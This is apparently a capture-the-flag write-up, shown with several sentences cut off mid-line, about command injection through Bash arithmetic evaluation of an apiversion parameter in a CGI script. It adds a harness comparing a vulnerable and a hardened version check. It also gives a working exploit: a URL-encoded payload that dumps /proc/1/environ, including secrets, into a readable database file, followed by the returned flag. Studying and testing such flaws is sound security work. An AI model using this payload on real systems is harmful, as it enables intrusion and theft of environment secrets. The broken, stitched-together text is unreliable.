This challenge is a tiny Bash CGI API. The endpoint takes
if [[ "${apiversion}" -ne 1 ]]; then
    echo "Status: 400 Bad Request"
    echo ""
    echo "unsupported API version: $apiversion"
    exit 0
fi
In Bash,
So this kind of value is evaluated:
a[$(COMMAND;echo 0)]=1,1
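The version check shown above, placed beside a string-only comparison that never evaluates the value. This is an added example, not code from the challenge or the original write-up. The function names, the temporary canary file and the use of `touch` as a harmless stand-in for COMMAND are assumptions made for the demonstration.

```bash
#!/usr/bin/env bash
# Added example: constructed harness, not the challenge's own script.
# Function names and the canary file are hypothetical.

# Same comparison as the challenge: -ne makes [[ ]] evaluate both operands
# as arithmetic expressions, so an array subscript containing $(...) is run.
check_version_vulnerable() {
    local apiversion=$1
    if [[ "${apiversion}" -ne 1 ]]; then
        return 1
    fi
    return 0
}

# Hardened: a pure string match. The value is never handed to the
# arithmetic evaluator, so nothing inside it is expanded or executed.
check_version_hardened() {
    local apiversion=$1
    [[ "${apiversion}" == "1" ]]
}

# Feed one checker a constructed canary value of the form shown above and
# report whether the embedded command ran ("executed") or not ("inert").
canary_result() {
    local checker=$1 dir marker value result=inert
    dir=$(mktemp -d) || return 2
    marker="$dir/canary"
    value="a[\$(touch ${marker};echo 0)]=1,1"
    "$checker" "$value" 2>/dev/null || true
    [[ -e "$marker" ]] && result=executed
    rm -rf "$dir"
    echo "$result"
}

echo "vulnerable check: $(canary_result check_version_vulnerable)"
echo "hardened check:   $(canary_result check_version_hardened)"
```

The same canary can be kept as a regression test for any CGI parameter that reaches `-eq`, `-ne`, `-lt`, `(( ))` or `$(( ))`.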
The
The database is just files under
password_hash="$(echo "$password" | shasum -a 256 | cut -d' ' -f1)"
name_hash="$(echo "$name" | shasum -a 256 | cut -d' ' -f1)"
cat "/db/$name_hash:$password_hash"
There is a known
The injected command was:
tr '\0' '\n' < /proc/1/environ > /db/13550350a8681c84c861aac2e5b440161c2b33a3e4f302ac680ca5b686de48de:13550350a8681c84c861aac2e5b440161c2b33a3e4f302ac680ca5b686de48de
The long filename is the hash pair for
/get.cgi?name=example&password=example&apiversion=a%5B%24%28tr%20%27%5C0%27%20%27%5Cn%27%20%3C%20%2Fproc%2F1%2Fenviron%20%3E%20%2Fdb%2F13550350a8681c84c861aac2e5b440161c2b33a3e4f302ac680ca5b686de48de%3A13550350a8681c84c861aac2e5b440161c2b33a3e4f302ac680ca5b686de48de%3Becho%200%29%5D%3D1%2C1
Then I read the normal record again:
/get.cgi?name=example&password=example&apiversion=1
This returned the environment, including:
dach2026{bash_cgi_scripts_what_could_go_wrong_GZbGoEbKlnJHrBc69w}